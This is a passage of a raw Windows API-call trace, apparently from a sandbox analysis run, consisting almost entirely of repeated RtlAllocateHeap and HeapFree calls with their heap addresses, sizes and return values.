Size=0x8) returned 0x2e7d08 [0033.031] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.031] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.031] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.031] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.031] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.031] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.031] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.031] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.031] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.031] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.031] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.031] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.031] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.031] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.031] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.031] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.031] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.031] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.031] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.031] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.031] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.031] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.031] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.032] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.032] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.032] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.032] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.032] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.032] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.032] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.032] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.032] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.032] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.032] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.032] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.032] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.032] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.032] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.032] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.032] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.032] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.032] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.032] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.032] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.032] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.032] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.032] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.032] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.032] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.032] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.032] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.032] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.032] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.032] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.032] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.032] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.032] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.032] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.032] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.032] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.033] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.033] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.033] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.033] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.033] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.033] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.033] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.033] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.033] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.033] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.033] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.033] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.033] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.033] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.033] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.033] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.033] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.033] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.033] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.033] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.033] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.033] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.033] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.033] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eaf60 | out: hHeap=0x2b0000) returned 1 [0033.033] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eae48 | out: hHeap=0x2b0000) returned 1 [0033.033] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ecd18 | out: hHeap=0x2b0000) returned 1 [0033.033] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eb190 | out: hHeap=0x2b0000) returned 1 [0033.033] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2bef88 | out: hHeap=0x2b0000) returned 1 [0033.033] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9eb0 [0033.033] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9e20 [0033.033] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9d90 [0033.033] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9d00 [0033.033] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9c70 [0033.033] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9be0 [0033.033] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9b50 [0033.033] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9ac0 [0033.034] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9a30 [0033.034] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e99a0 [0033.034] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9910 [0033.034] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9880 [0033.034] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e97f0 [0033.034] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9760 [0033.034] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e96d0 [0033.034] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e8c20 [0033.034] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e8cb0 [0033.034] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e8d40 [0033.034] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e8dd0 [0033.034] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e8e60 [0033.034] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e8ef0 [0033.034] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e8f80 [0033.034] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9010 [0033.034] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e90a0 [0033.034] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9130 [0033.034] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e91c0 [0033.034] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9250 [0033.034] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e92e0 [0033.034] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9370 [0033.034] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9400 [0033.034] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9490 [0033.034] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9520 [0033.109] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9eb0 | out: hHeap=0x2b0000) returned 1 [0033.109] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9e20 | out: hHeap=0x2b0000) returned 1 [0033.109] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9d90 | out: hHeap=0x2b0000) returned 1 [0033.109] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9d00 | out: hHeap=0x2b0000) returned 1 [0033.109] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9c70 | out: hHeap=0x2b0000) returned 1 [0033.109] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9be0 | out: hHeap=0x2b0000) returned 1 [0033.109] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9b50 | out: hHeap=0x2b0000) returned 1 [0033.109] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9ac0 | out: hHeap=0x2b0000) returned 1 [0033.109] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9a30 | out: hHeap=0x2b0000) returned 1 [0033.109] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e99a0 | out: hHeap=0x2b0000) returned 1 [0033.109] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9910 | out: hHeap=0x2b0000) returned 1 [0033.109] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9880 | out: hHeap=0x2b0000) returned 1 [0033.109] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e97f0 | out: hHeap=0x2b0000) returned 1 [0033.109] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9760 | out: hHeap=0x2b0000) returned 1 [0033.109] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e96d0 | out: hHeap=0x2b0000) returned 1 [0033.109] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8c20 | out: hHeap=0x2b0000) returned 1 [0033.109] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8cb0 | out: hHeap=0x2b0000) returned 1 [0033.109] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8d40 | out: hHeap=0x2b0000) returned 1 [0033.109] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8dd0 | out: hHeap=0x2b0000) returned 1 [0033.109] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8e60 | out: hHeap=0x2b0000) returned 1 [0033.109] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8ef0 | out: hHeap=0x2b0000) returned 1 [0033.109] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8f80 | out: hHeap=0x2b0000) returned 1 [0033.109] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9010 | out: hHeap=0x2b0000) returned 1 [0033.109] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e90a0 | out: hHeap=0x2b0000) returned 1 [0033.109] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9130 | out: hHeap=0x2b0000) returned 1 [0033.109] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e91c0 | out: hHeap=0x2b0000) returned 1 [0033.109] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9250 | out: hHeap=0x2b0000) returned 1 [0033.109] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e92e0 | out: hHeap=0x2b0000) returned 1 [0033.109] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9370 | out: hHeap=0x2b0000) returned 1 [0033.109] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9400 | out: hHeap=0x2b0000) returned 1 [0033.109] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9490 | out: hHeap=0x2b0000) returned 1 [0033.109] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9520 | out: hHeap=0x2b0000) returned 1 [0033.109] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e95b0 | out: hHeap=0x2b0000) returned 1 [0033.109] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ead30 | out: hHeap=0x2b0000) returned 1 [0033.110] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2e6bf8 [0033.110] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2ecd18 [0033.110] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2ece20 [0033.110] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x108) returned 0x2ead30 [0033.110] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.110] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0xc) returned 0x2bef88 [0033.110] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2eb190 [0033.110] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ecd18 | out: hHeap=0x2b0000) returned 1 [0033.110] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e95b0 [0033.110] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ece20 | out: hHeap=0x2b0000) returned 1 [0033.110] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2eae48 [0033.110] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e95b0 | out: hHeap=0x2b0000) returned 1 [0033.110] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.110] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0xc) returned 0x2befa0 [0033.110] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.110] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.110] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x88) returned 0x2e95b0 [0033.110] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2befa0 | out: hHeap=0x2b0000) returned 1 [0033.110] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2eaf60 [0033.110] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e95b0 | out: hHeap=0x2b0000) returned 1 [0033.110] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.110] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.110] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.110] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.110] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.110] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.110] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.110] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.110] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.110] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.110] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.110] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.110] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.110] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.110] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.111] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.111] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.111] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.111] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.111] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.111] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.111] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.111] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.111] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.111] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.111] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.111] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.111] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.111] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.111] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.111] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.111] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.111] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.111] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.111] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.111] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.111] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.111] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.111] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.111] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.111] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.111] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.111] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.111] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.111] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.111] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.111] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.111] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.111] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.111] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.111] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.112] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.112] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.112] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.112] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.112] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.112] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.112] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.112] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.112] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.112] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.112] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.112] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.112] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) 